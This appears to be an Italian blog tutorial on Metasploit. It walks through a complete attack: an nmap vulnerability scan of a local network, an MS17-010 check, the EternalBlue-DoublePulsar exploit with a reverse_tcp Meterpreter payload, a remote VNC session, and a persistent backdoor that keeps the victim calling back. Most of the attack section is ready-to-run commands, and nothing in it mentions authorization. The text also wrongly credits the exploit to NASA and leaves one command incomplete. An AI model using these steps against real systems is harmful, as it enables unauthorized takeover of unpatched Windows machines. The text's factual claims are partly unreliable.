Come abbiamo discusso la TOP 25 BEST KALI LINUX TOOL, e abbiamo messo METASPLOIT al primo posto nella lista, ora discutiamo e impariamo su METASPLOIT. Vi consigliamo di avere familiarità con Metasploit.

Metasploit inizialmente creato da H. D Moore nel 2003, fino a quando è stato acquisito e sviluppato ulteriormente da Rapid7 il 21 ottobre 2009. Metasploit-framework è completamente scritto usando Ruby, ed è un pacchetto standard installato nel sistema Kali Linux (e anche in quasi tutti i sistemi operativi di Penetration Testing, credo). Si tratta di un kit preferito dagli hacker o dai penetration tester per ricercare vulnerabilità di sicurezza, sviluppare ed eseguire exploit su obiettivi, e altri sviluppi di sicurezza.

Metasploit è disponibile con diverse edizioni, generalmente divise in due categorie, versione gratuita e versione a pagamento. Le versioni gratuite: Metasploit Framework Community Edition (interfaccia basata su CLI) e Armitage (interfaccia basata su GUI). Le versioni a pagamento: Metasploit Express, Metasploit Pro, e Cobalt Strike (è simile a Armitage, che è fornito da Strategic Cyber LLC).

Metasploit permette agli utenti di creare (o sviluppare) il proprio codice exploit, ma non preoccupatevi se non sapete come codificare, Metasploit ha così tanti moduli e sono continuamente aggiornati. Attualmente Metasploit ha oltre 1600 exploit e 500 payloads. Il modo semplice per capire cosa sono gli exploit e i payload, un exploit è fondamentalmente il modo in cui l’attaccante consegna il payload, attraverso il buco di vulnerabilità del sistema di destinazione. Una volta che l’attaccante lancia l’exploit che contiene un payload contro il target vulnerabile, poi il payload distribuito (payload utilizzato per connettersi di nuovo all’attaccante per ottenere l’accesso remoto contro il sistema target), in questa fase l’exploit è fatto, e diventa irrilevante.

“Metasploit non è uno strumento istantaneo di hacking, è un framework folle”

Questo articolo di Metasploit riguarda la conduzione di test di penetrazione contro un sistema target utilizzando il seguente flusso:

  • Vulnerability Scanning
  • Vulnerability Assessment
  • Exploiting
  • Avere accesso remoto – possedere il sistema

PREPARAZIONE

Assicurati che il nostro Kali Linux abbia l’ultima versione aggiornata. Ci saranno miglioramenti all’interno di ogni aggiornamento. Eseguite i seguenti comandi:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Una volta che la nostra macchina è aggiornata, iniziamo a lanciare la console di Metasploit. Nel terminale, digitate:

~# msfconsole

E inoltre è necessario un qualsiasi editor di testo, Gedit o Leafpad, per raccogliere alcune informazioni lungo il percorso prima di compilare l’attacco. Per prima cosa, identificate l’indirizzo IP dell’interfaccia wireless, l’IP del router e la netmask.

In base alle informazioni di cui sopra annotiamo l’indirizzo IP della WLAN1 e del router, e la netmask. Quindi, la nota dovrebbe assomigliare a questa:

IP dell’attaccante (LHOST): 192.168.1.56
IP del gateway/router: 192.168.1.1
Netmask: 255.255.255.0(/24)

STEP 1 : VULNERABILITY SCANNING

Nella console di metasploit, raccogliamo innanzitutto informazioni, come l’indirizzo IP dell’obiettivo, il sistema operativo, le porte aperte e la vulnerabilità. Metasploit ci permette di eseguire NMap direttamente dalla console. Sulla base delle informazioni di cui sopra eseguire questo comando per realizzare il nostro compito di raccolta delle informazioni.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Dal comando di cui sopra abbiamo ottenuto il risultato qui sotto.

Abbiamo ottenuto un obiettivo vulnerabile con sistema operativo Windows, e la vulnerabilità è sul servizio SMBv1. Quindi, aggiungere alla nota.

Ip del bersaglio (RHOST): 192.168.1.57
Vulnerabilità: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

STEP 2 : VULNERABILITY ASSESSMENT

Ora sappiamo l’obiettivo e la sua vulnerabilità. Controlliamo la vulnerabilità nella console di metasploit

Ora conosciamo l’obiettivo e la sua vulnerabilità. Controlliamo la vulnerabilità nella console di Metasploit usando il modulo ausiliario smb_scanner. Eseguite il seguente comando:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run

Metasploit è sicuro della vulnerabilità, e mostra l’esatta edizione di Windows OS. Aggiungi alla nota:

Target OS: Windows 7 Ultimate 7600

STEP 3 : EXPLOITING

Sfortunatamente, metasploit non ha nessun modulo exploit relativo a questa vulnerabilità. Ma, non preoccupatevi, c’è un tizio fuori che ha esposto e scritto il codice dell’exploit. L’exploit è familiare, dato che è iniziato dalla NASA e si chiama EternalBlue-DoublePulsar. Puoi prenderlo da qui, o puoi seguire la guida dal video tutorial qui sotto per installare il codice exploit nel tuo framework metasploit.

Una volta che hai seguito la guida qui sopra, (assicurati che il percorso sia lo stesso del tutorial). Ora siete pronti a sfruttare l’obiettivo. Esegui i seguenti comandi:

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Exploit

Boom… L’exploit è riuscito, abbiamo la sessione di meterpreter. Come ho detto prima, una volta che l’exploit è stato lanciato distribuirà il payload, che è, qui abbiamo usato, windows/meterpreter/reverse_tcp.

STEP 4 : OTTENERE L’ACCESSO REMOTO

Esploriamo i comandi disponibili, inseriamo ‘?’ (senza punto interrogativo) e vediamo i comandi disponibili elencati. Lo Stdapi, i comandi di sistema sono:

Per vedere più informazioni sul sistema di destinazione, usa il comando ‘sysinfo’. L’output dovrebbe assomigliare a questo.

Siccome abbiamo iniettato il processo di sistema prima (spoolsv.exe), abbiamo i privilegi di sistema. Possediamo l’obiettivo. Possiamo fare molto con il comando al bersaglio. Per esempio potremmo eseguire RDP, o semplicemente impostare VNC remoto. Per eseguire il servizio VNC inserire il comando:

~# run vnc

Il risultato dovrebbe essere il desktop della macchina di destinazione, è simile a questo.

La parte più importante è creare una backdoor, così ogni volta che il target si disconnette dalla nostra macchina, la macchina di destinazione cercherà di connettersi nuovamente a noi. Il backdooring è usato per mantenere l’accesso, è come la pesca, non ributterete il vostro pesce nell’acqua una volta che avete preso il pesce, giusto? Volete fare qualcosa con il pesce, se salvarlo in frigorifero per ulteriori azioni, come cucinare o venderlo per soldi.

Meterpreter ha questa funzione di backdooring persistente. Eseguite il seguente comando, e date un’occhiata ai parametri e agli argomenti disponibili.

meterpreter > run persistence -h

Se non siete a vostro agio con questo script deprecato, il modulo di persistenza più recente è sotto post/windows/manage/persistence_exe. Potete esplorarlo ulteriormente da soli.

Metasploit è enorme, non è solo uno strumento, è un framework, considerate che ha oltre 1600 exploit e circa 500 payloads. Un articolo è solo adatto per il quadro generale dell’uso generale o dell’idea. Ma, hai imparato così tanto da questo articolo.

“Più segui il flusso dell’attacco più hai una sfida senza sforzo.”

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.